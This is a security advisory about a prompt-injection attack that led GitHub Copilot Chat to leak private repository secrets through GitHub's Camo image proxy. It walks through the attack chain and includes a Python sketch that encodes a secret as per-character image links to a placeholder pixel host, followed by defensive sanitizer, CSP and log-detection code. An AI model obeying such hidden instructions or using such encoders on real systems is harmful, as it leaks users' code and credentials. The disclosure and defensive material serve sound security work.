Severity
High
Analysis Summary
A researcher discovered a high-severity prompt-injection attack against GitHub Copilot Chat that abused GitHub’s own image proxy (Camo) to exfiltrate secrets and source code from private repositories. Instead of sending stolen text directly to an attacker’s server, the exploit instructed Copilot to encode sensitive characters as invisible images; when the victim’s browser rendered those images, it made outbound requests that leaked the data. The attack blended social-engineering-style prompt injection with infrastructure abuse rather than exploiting a classic memory-corruption or overflow bug.
According to the researcher, the attack chained three steps: (1) a hidden prompt or specially crafted comment in a pull request (or other repository content) coerced Copilot into extracting a secret or code snippet; (2) output-handling and CSP protections were bypassed so that Copilot’s response could reference externally hosted images; and (3) GitHub’s Camo image proxy was abused: the researcher precomputed valid, signed Camo URLs mapping each character and symbol to a 1×1 transparent pixel hosted on an attacker-controlled server. By having Copilot “draw” the stolen string as a sequence of those tiny images, the victim’s browser issued a series of legitimate-looking Camo requests that encoded the secret one character at a time.
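To make the covert channel concrete, the sketch below shows how a string can be rendered as a sequence of per-character image references of the kind the researcher describes. It is a minimal illustration only: the pixel host and URL scheme are hypothetical placeholders, not the pre-signed camo.githubusercontent.com URLs used in the actual proof-of-concept.

```python
# Illustrative sketch: encode a string as per-character image references,
# mirroring the covert channel described above. All URLs are placeholders.

# Hypothetical precomputed map: each character -> URL of a 1x1 transparent pixel.
ALPHABET = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-"
PIXEL_URLS = {ch: f"https://pixels.example/{ord(ch):02x}.png" for ch in ALPHABET}

def encode_as_images(secret: str) -> str:
    """Return markdown that 'draws' the secret as a run of invisible images.

    When a client renders this markdown, it issues one image request per
    character, leaking the string to whoever serves the pixels.
    """
    return "".join(f"![]({PIXEL_URLS[ch]})" for ch in secret if ch in PIXEL_URLS)

if __name__ == "__main__":
    print(encode_as_images("ghp_example_token"))
```

Each rendered response therefore produces a burst of tiny, legitimate-looking image fetches whose order reconstructs the secret on the attacker’s side.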
The proof-of-concept successfully reconstructed private repository contents and secret material in lab tests, demonstrating real-world impact; the researcher reported a high CVSS score and coordinated disclosure with GitHub via HackerOne. Beyond data theft, the attack showed how AI assistants that read and synthesize private project content create new, non-traditional exfiltration channels when client-side rendering and platform proxies are trusted implicitly. The finding drew broad press coverage and vendor attention because it exposed a new, practical pattern: prompt injection + trusted proxy = covert data pipeline.
GitHub responded by removing the abused capability, disabling image rendering inside Copilot Chat (neutralizing the Camo-based channel), and rolling out mitigations to harden input/output handling for Copilot interfaces; the vendor also engaged in coordinated disclosure and patching steps. The incident underlines three practical defenses: treat all LLM outputs as untrusted by design (strict I/O sanitization and partitioning), limit or audit automatic fetching and rendering of external resources (especially through platform proxies), and add provenance and intent checks when assistants access private data. Organizations should also assume attacker creativity, regularly test agent integrations adversarially, and monitor for unusual outbound fetch patterns through internal proxies.
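As a concrete example of treating LLM output as untrusted, the minimal sketch below strips image references from an assistant’s markdown response before it reaches a rendering client, which is the conservative equivalent of GitHub’s decision to disable image rendering. The function name and regex are illustrative assumptions, not GitHub’s actual implementation.

```python
import re

# Matches markdown image syntax: ![alt](url)
MD_IMAGE = re.compile(r"!\[[^\]]*\]\([^)]*\)")

def sanitize_llm_output(markdown: str) -> str:
    """Remove all image references from an assistant's markdown response.

    Rendering images from model output triggers outbound requests the user
    never reviewed; in this incident even the platform's own proxy (Camo) was
    abused, so the conservative default is to render no images at all.
    """
    return MD_IMAGE.sub("", markdown)

# Example: the exfiltration payload from the earlier sketch is neutralized.
# sanitize_llm_output("Answer ![](https://pixels.example/61.png)") -> "Answer "
```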
Impact
- Gain Access
Remediation
- Disable image rendering within Copilot Chat and similar AI interfaces to prevent data exfiltration via image-based payloads.
- Harden input and output sanitization in AI-driven tools to block prompt injections or unauthorized command execution.
- Restrict Copilot’s access to sensitive or private repositories unless explicitly approved by the user.
- Implement strict Content Security Policies (CSP) to block automatic loading of external images or scripts (an example header configuration follows this list).
- Audit and validate proxy services like GitHub’s Camo to ensure signed URLs cannot be pre-generated or abused.
- Monitor outbound traffic from developer environments for unusual or repetitive external requests (e.g., invisible 1×1 image calls).
- Add anomaly detection rules in security tools to identify suspicious data exfiltration patterns via HTTP requests (a detection sketch follows this list).
- Conduct prompt-injection testing and red-team exercises for LLM integrations to uncover potential abuse paths.
- Apply least-privilege access controls for Copilot and any AI assistant integrated with private codebases.
- Regularly review and update security policies to include AI-specific risks such as data leakage through model interaction.
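As a sketch of the CSP item above, the snippet below shows one way a web-based developer tool could attach a restrictive Content-Security-Policy header that denies external image loads. The Flask app and exact directive values are illustrative assumptions, not a specific vendor’s configuration.

```python
from flask import Flask

app = Flask(__name__)

# Illustrative policy: images and scripts may only come from the app's own
# origin; everything else is denied by default.
CSP = "default-src 'self'; img-src 'self'; script-src 'self'; object-src 'none'"

@app.after_request
def set_csp(response):
    # Applied to every response, this blocks automatic browser fetches of
    # attacker-hosted images (e.g., invisible 1x1 pixels).
    response.headers["Content-Security-Policy"] = CSP
    return response
```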
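For the monitoring and anomaly-detection items, the sketch below scans egress or proxy logs for clients issuing unusually long runs of tiny image fetches, the pattern a per-character pixel exfiltration would produce. The log format, field names, and threshold are assumptions for illustration; adapt them to your own telemetry.

```python
import csv
from collections import Counter

BURST_THRESHOLD = 50  # assumed cutoff: many image fetches from one client per window

def flag_pixel_bursts(log_path: str) -> dict[str, int]:
    """Count image requests per client in a CSV log and flag suspicious bursts.

    A secret exfiltrated one character per 1x1 image produces an unusual run of
    near-identical .png/.gif fetches from the same client in a short period.
    Assumed log columns: "client", "url" (one row per outbound request).
    """
    counts: Counter = Counter()
    with open(log_path, newline="") as fh:
        for row in csv.DictReader(fh):
            if row["url"].lower().endswith((".png", ".gif")):
                counts[row["client"]] += 1
    return {client: n for client, n in counts.items() if n >= BURST_THRESHOLD}
```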